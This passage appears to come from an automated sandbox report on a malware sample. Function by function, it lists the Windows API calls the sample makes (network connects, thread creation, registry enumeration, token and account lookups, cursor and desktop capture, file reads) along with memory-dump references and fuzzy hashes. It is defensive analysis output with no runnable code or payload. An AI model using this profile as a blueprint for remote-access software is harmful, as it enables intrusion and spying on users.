                                • Instruction Fuzzy Hash: A121E1367042555BE328DA389C45B2BB7E2FBC4761F658229FA46E72D0CEF4EC008618
                                Function 100066F0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 92threadnetworkCOMMON
                                Download Yara Rule
                                APIs
                                • inet_addr.WS2_32(?), ref: 100066F7
                                • gethostbyname.WS2_32(?), ref: 10006703
                                • inet_ntoa.WS2_32(?), ref: 1000672D
                                • CreateThread.KERNEL32(00000000,00000000,Function_000040F0,00000000,00000000,00000000), ref: 1000679B
                                • CloseHandle.KERNEL32(00000000), ref: 1000679E
                                • CreateThread.KERNEL32(00000000,00000000,10006410,00000000,00000000,00000000), ref: 100067DA
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoa
                                • String ID: gfff
                                • API String ID: 772126777-1553575800
                                • Opcode ID: f01e47dce8243ebdbacc13b674b2ed14e172bd6594d26d58a762836b05828d2e
                                • Instruction ID: 58ebadb22f4f2352d4f0c07478b8d6832934a2795fef116bc6cf84ea50f8ad69
                                • Opcode Fuzzy Hash: f01e47dce8243ebdbacc13b674b2ed14e172bd6594d26d58a762836b05828d2e
                                • Instruction Fuzzy Hash: BC21B4367046155BE328DA399C85B1AB7E3FBC8760F658229FA16E72D4CEF4EC048614
                                Function 10068A70 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 80COMMON
                                Download Yara Rule
                                APIs
                                • ??2@YAPAXI@Z.MSVCRT(0000000C,?), ref: 10068AA6
                                • ??2@YAPAXI@Z.MSVCRT(00019018,0000000C,?), ref: 10068ADA
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 10068B01
                                • CoInitialize.OLE32(00000000), ref: 10068B0B
                                • CreateWindowExA.USER32(00000000,#32770,1007DE30,80000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 10068B2D
                                • ShowWindow.USER32(00000000,00000000), ref: 10068B38
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: ??2@CreateWindow$EventInitializeShow
                                • String ID: #32770
                                • API String ID: 1167904864-463685578
                                • Opcode ID: a8919276c058a7dec2df6c51b7871ff0220c943c339c5ac3a0e52b428adf2aba
                                • Instruction ID: c40a7aba82008906b23f1e1996f2c44ea210c5d9a3af39e251ea5516931b2029
                                • Opcode Fuzzy Hash: a8919276c058a7dec2df6c51b7871ff0220c943c339c5ac3a0e52b428adf2aba
                                • Instruction Fuzzy Hash: D8212BB0904B909FD320DF6A8D84A56FBE8FB08740F808D2EE59AD7A00D378A9048F55
                                Function 1000FF60 Relevance: 12.2, APIs: 8, Instructions: 169sleepCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 10010520: ReleaseDC.USER32(?,?), ref: 1001053A
                                  • Part of subcall function 10010520: GetDesktopWindow.USER32 ref: 10010540
                                  • Part of subcall function 10010520: GetDC.USER32(00000000), ref: 1001054D
                                • GetCursorPos.USER32(?), ref: 1000FF9A
                                • GetCursorInfo.USER32(?), ref: 1000FFBB
                                • DestroyCursor.USER32(?), ref: 1000FFE4
                                • GetTickCount.KERNEL32 ref: 100100D8
                                • Sleep.KERNEL32(00000001), ref: 100100ED
                                • GetTickCount.KERNEL32 ref: 100100EF
                                • GetTickCount.KERNEL32 ref: 100100FC
                                • InterlockedExchange.KERNEL32(?,00000000), ref: 10010100
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CountCursorTick$DesktopDestroyExchangeInfoInterlockedReleaseSleepWindow
                                • String ID:
                                • API String ID: 3294368536-0
                                • Opcode ID: c5f34d767c69b0e8f4653ca02a3eccce7082b20d11c505590905a968b1b8466f
                                • Instruction ID: 7b30b2465e0484a6c358d486dbc3e3e74d89055d9b4a2f1a32c3f10f469ee35a
                                • Opcode Fuzzy Hash: c5f34d767c69b0e8f4653ca02a3eccce7082b20d11c505590905a968b1b8466f
                                • Instruction Fuzzy Hash: 18515E753007459FE724DF28C880A6BB3E6FF88350F144A2DF5868B652DBB1F9858B61
                                Function 1000E050 Relevance: 12.2, APIs: 8, Instructions: 153registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,000F003F,?), ref: 1000E06A
                                • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00000000,00000000), ref: 1000E09C
                                • LocalAlloc.KERNEL32(00000040,?), ref: 1000E0DB
                                • ??2@YAPAXI@Z.MSVCRT(?), ref: 1000E118
                                • RegEnumKeyExA.ADVAPI32(?,?,00000000,?,00000000,00000000,00000000,00000000), ref: 1000E16D
                                • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 1000E1B2
                                • RegCloseKey.ADVAPI32(?), ref: 1000E1BF
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: ??2@??3@AllocCloseEnumInfoLocalOpenQuery
                                • String ID:
                                • API String ID: 71355648-0
                                • Opcode ID: 1b3f5b42f68fdcce1c58f7bbc302b9c5cda5b5ea1952274546a23c865a8c7550
                                • Instruction ID: 1bdc6b41a68a7066ed18929c9f9129e6b3d940a8bf03ad75385409d59a1399c2
                                • Opcode Fuzzy Hash: 1b3f5b42f68fdcce1c58f7bbc302b9c5cda5b5ea1952274546a23c865a8c7550
                                • Instruction Fuzzy Hash: 314190716083556FE314CF28CC84A6BBBE9EBC8750F048A2DFA49D7240D675DD05CBA2
                                Function 10011650 Relevance: 12.1, APIs: 8, Instructions: 140memoryCOMMON
                                Download Yara Rule
                                APIs
                                • OpenProcessToken.ADVAPI32(?,00020028,?,?,1007B960,76F90440,00000000), ref: 100116A6
                                • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 100116D5
                                • GlobalAlloc.KERNEL32(00000040,?), ref: 100116E2
                                • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,?,?), ref: 10011700
                                • LookupAccountSidA.ADVAPI32 ref: 10011740
                                • LookupAccountSidA.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 10011780
                                • GlobalFree.KERNEL32(00000000), ref: 100117B1
                                • CloseHandle.KERNEL32(?), ref: 100117BC
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Token$AccountGlobalInformationLookup$AllocCloseFreeHandleOpenProcess
                                • String ID:
                                • API String ID: 1197180021-0
                                • Opcode ID: cd3f6368fc5de75794a3751305e067986b9434606f0aaa1555814f9806c69931
                                • Instruction ID: aef5199e8c4097825b2e0746fe6a036d64d1b07520511a5969cee2b76a0b1f35
                                • Opcode Fuzzy Hash: cd3f6368fc5de75794a3751305e067986b9434606f0aaa1555814f9806c69931
                                • Instruction Fuzzy Hash: 714182762083456FE714DF64C8C49AFB7E9FBC8354F01092DF68597280D6B5ED488BA2
                                Function 0040394B Relevance: 12.1, APIs: 8, Instructions: 132COMMON
                                Download Yara Rule
                                APIs
                                • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00401ABD), ref: 00403966
                                • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00401ABD), ref: 0040397A
                                • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00401ABD), ref: 004039A6
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00401ABD), ref: 004039DE
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00401ABD), ref: 00403A00
                                • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00401ABD), ref: 00403A19
                                • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00401ABD), ref: 00403A2C
                                • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00403A6A
                                Memory Dump Source
                                • Source File: 00000003.00000002.3257874536.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.3254439993.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3264508159.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3268423591.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3276394847.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3281553731.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                Similarity
                                • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                • String ID:
                                • API String ID: 1823725401-0
                                • Opcode ID: fdaf88406933dcfd8653669e040d0f2276af1562a5d27b84b999c574dcd3bfdd
                                • Instruction ID: ad9dd923ed9d3c248ceca5dc3862fa0172e5803eec53910c5ff1caad3bb93819
                                • Opcode Fuzzy Hash: fdaf88406933dcfd8653669e040d0f2276af1562a5d27b84b999c574dcd3bfdd
                                • Instruction Fuzzy Hash: A831D4B26042116FD7207F796CC483BBE9CE649346B15063BF592F3280D6794E454BA9
                                Function 10004FF0 Relevance: 12.1, APIs: 8, Instructions: 63networksleepthreadCOMMON
                                Download Yara Rule
                                APIs
                                • WSAStartup.WS2_32(00000202,?), ref: 10005000
                                • htons.WS2_32 ref: 10005027
                                • inet_addr.WS2_32(1007DD2C), ref: 10005037
                                • socket.WS2_32(00000002,00000001,00000000), ref: 10005066
                                • connect.WS2_32(00000000,?,00000010), ref: 10005072
                                • Sleep.KERNEL32(00000028), ref: 10005076
                                • closesocket.WS2_32(00000000), ref: 10005079
                                • RtlExitUserThread.NTDLL(00000000), ref: 1000508E
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitSleepStartupThreadUserclosesocketconnecthtonsinet_addrsocket
                                • String ID:
                                • API String ID: 3058909470-0
                                • Opcode ID: 0d43decbdbb566f624c2e78acbbe4a05a8f4958255bdb2bec673a0d53eb05e7d
                                • Instruction ID: 902ebb94e04e1c7c5fd66402ba9005c87273360587b7ce246dad50b3abbda6e0
                                • Opcode Fuzzy Hash: 0d43decbdbb566f624c2e78acbbe4a05a8f4958255bdb2bec673a0d53eb05e7d
                                • Instruction Fuzzy Hash: 871170711053A4ABF310AF65CC89B6ABBB9FF49B41F00841EF19887291DBB598048B66
                                Function 10003B70 Relevance: 10.7, APIs: 7, Instructions: 192COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                • String ID:
                                • API String ID: 1486965892-0
                                • Opcode ID: 4a41479000e2c6dc63f04f288e1a2f889cd3f381eddac7c77dc14844e2b0364b
                                • Instruction ID: e4da530426af2831799a229c98be5beb60846619531619ef35dcfd8c2b457cff
                                • Opcode Fuzzy Hash: 4a41479000e2c6dc63f04f288e1a2f889cd3f381eddac7c77dc14844e2b0364b
                                • Instruction Fuzzy Hash: 5751A875A00544ABEB05DF65CC41BDFB7BEEF85790F00C129F509AB245DB34B90587A1
                                Function 10004660 Relevance: 10.6, APIs: 7, Instructions: 98threadnetworkCOMMON
                                Download Yara Rule
                                APIs
                                • GetVersionExA.KERNEL32 ref: 10004676
                                • inet_addr.WS2_32(?), ref: 100046A1
                                • gethostbyname.WS2_32(?), ref: 100046AD
                                • inet_ntoa.WS2_32(?), ref: 100046D7
                                • CreateThread.KERNEL32(00000000,00000000,Function_000040F0,00000000,00000000,00000000), ref: 1000474B
                                • CloseHandle.KERNEL32(00000000), ref: 1000474E
                                • CreateThread.KERNEL32(00000000,00000000,Function_00004310,00000000,00000000,00000000), ref: 1000477A
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread$CloseHandleVersiongethostbynameinet_addrinet_ntoa
                                • String ID:
                                • API String ID: 3347725681-0
                                • Opcode ID: c6a6eae582f774ebee1582ccb1dd4bd013eb24fbee5d9ee572dfd0d40f39049d
                                • Instruction ID: df4bb2cff17a4dad36bc039b66e6a0bfb7aaed8d7346e5ccee572720da75d4d5
                                • Opcode Fuzzy Hash: c6a6eae582f774ebee1582ccb1dd4bd013eb24fbee5d9ee572dfd0d40f39049d
                                • Instruction Fuzzy Hash: A93123722443405BF328DB348C84B2A77E6EB85760F62462DF94A972D0CFB8AC44C609
                                Function 100087D0 Relevance: 10.6, APIs: 7, Instructions: 96stringfilememoryCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,00000000), ref: 1000881C
                                • GetFileSize.KERNEL32(00000000,?,?,?,?,00000000), ref: 1000883B
                                • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 10008844
                                • lstrlen.KERNEL32(?,?,?,00000000), ref: 1000884B
                                • LocalAlloc.KERNEL32(00000040,00000000,?,?,00000000), ref: 10008859
                                • lstrlen.KERNEL32(?,?,?,00000000), ref: 10008887
                                • LocalFree.KERNEL32(00000000,00000000,00000000,?,?,00000000), ref: 100088AF
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileLocallstrlen$AllocCloseCreateFreeHandleSize
                                • String ID:
                                • API String ID: 2793549963-0
                                • Opcode ID: e25fcf27649b93bfccbddb0c98ffd84884aebec2cb7528cc99923d21b6815ae0
                                • Instruction ID: aba3aad5fd678ceee709943c066d7c1318fba4e8ca5bf8cd350ee25dca26516d
                                • Opcode Fuzzy Hash: e25fcf27649b93bfccbddb0c98ffd84884aebec2cb7528cc99923d21b6815ae0
                                • Instruction Fuzzy Hash: C621E1327003145FE7089A78EC95A6BB6DAEBC8721F44453DFA02C7380EAF5AD09C760
                                Function 10005580 Relevance: 10.6, APIs: 7, Instructions: 93threadnetworkCOMMON
                                Download Yara Rule
                                APIs
                                • inet_addr.WS2_32(?), ref: 10005588
                                • gethostbyname.WS2_32(?), ref: 10005594
                                • inet_ntoa.WS2_32(?), ref: 100055BE
                                • CreateThread.KERNEL32(00000000,00000000,Function_000040F0,00000000,00000000,00000000), ref: 1000562C
                                • CloseHandle.KERNEL32(00000000), ref: 1000562F
                                • CreateThread.KERNEL32(00000000,00000000,Function_00004310,00000000,00000000,00000000), ref: 10005658
                                • CreateThread.KERNEL32(00000000,00000000,Function_00004BC0,00000000,00000000,00000000), ref: 1000566B
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoa
                                • String ID:
                                • API String ID: 772126777-0
                                • Opcode ID: 682f85eca88e854ade3a5e1b08e0358e6797b5844f76c8cc76ed74894ed0b74b
                                • Instruction ID: d8acfb67411859da9f326e055f778afd8bf87ba093dd899f6f4e0a5fb8b5cdca
                                • Opcode Fuzzy Hash: 682f85eca88e854ade3a5e1b08e0358e6797b5844f76c8cc76ed74894ed0b74b
                                • Instruction Fuzzy Hash: A321D8727403155BF328DB349C95B1B76E2FBC4761F65462DFA52A72D0CEF4AC048618
                                Function 10005680 Relevance: 10.6, APIs: 7, Instructions: 93threadnetworkCOMMON
                                Download Yara Rule
                                APIs
                                • inet_addr.WS2_32(?), ref: 10005688
                                • gethostbyname.WS2_32(?), ref: 10005694
                                • inet_ntoa.WS2_32(?), ref: 100056BE
                                • CreateThread.KERNEL32(00000000,00000000,Function_000040F0,00000000,00000000,00000000), ref: 1000572C
                                • CloseHandle.KERNEL32(00000000), ref: 1000572F
                                • CreateThread.KERNEL32(00000000,00000000,Function_00004130,00000000,00000000,00000000), ref: 10005758
                                • CreateThread.KERNEL32(00000000,00000000,Function_00004DC0,00000000,00000000,00000000), ref: 1000576B
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoa
                                • String ID:
                                • API String ID: 772126777-0
                                • Opcode ID: 3676fb98455793ff73a567f839e21bc22614870c3fd5789fe76a044b48827b80
                                • Instruction ID: 9488327e99ebaf0692ae378b052773dd40b9acca62f8510c4b65027830434a75
                                • Opcode Fuzzy Hash: 3676fb98455793ff73a567f839e21bc22614870c3fd5789fe76a044b48827b80
                                • Instruction Fuzzy Hash: 7F21E4327443156BF324DB349C85B1BB6E2EB84B60F254629FA02AB2D0CEF4AC048618
                                Function 10005780 Relevance: 10.6, APIs: 7, Instructions: 93threadnetworkCOMMON
                                Download Yara Rule
                                APIs
                                • inet_addr.WS2_32(?), ref: 10005788
                                • gethostbyname.WS2_32(?), ref: 10005794
                                • inet_ntoa.WS2_32(?), ref: 100057BE
                                • CreateThread.KERNEL32(00000000,00000000,Function_000040F0,00000000,00000000,00000000), ref: 1000582C
                                • CloseHandle.KERNEL32(00000000), ref: 1000582F
                                • CreateThread.KERNEL32(00000000,00000000,Function_00004130,00000000,00000000,00000000), ref: 10005858
                                • CreateThread.KERNEL32(00000000,00000000,Function_00004BC0,00000000,00000000,00000000), ref: 1000586B
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoa
                                • String ID:
                                • API String ID: 772126777-0
                                • Opcode ID: 69e58f35093950da0f615bc0284163a56cc3614a623f534f56f7dfb3f7cc9610
                                • Instruction ID: 5a4b8bc2c2b8071631b041413c90c1d326417705303120385d25498e08fc0dd5
                                • Opcode Fuzzy Hash: 69e58f35093950da0f615bc0284163a56cc3614a623f534f56f7dfb3f7cc9610
                                • Instruction Fuzzy Hash: D121B4727443156BF324DB349C85B1BB6E2EB84B61F254629FA52AB2D0CEF4EC048618
                                Function 100088D0 Relevance: 10.6, APIs: 7, Instructions: 86fileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,10007EAC,00000001), ref: 10008904
                                  • Part of subcall function 100089B0: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,10007EAC,00000001), ref: 100089D4
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: ??3@CreateFile
                                • String ID:
                                • API String ID: 1804927778-0
                                • Opcode ID: 582d5a0d7544c47434b001e0cd474194f736c7d2893807808bf8afdd30e53046
                                • Instruction ID: 535a8f0a5c1657d4f4a0f8731bc608884a1cc126f303587fb67b32ffd65e399e
                                • Opcode Fuzzy Hash: 582d5a0d7544c47434b001e0cd474194f736c7d2893807808bf8afdd30e53046
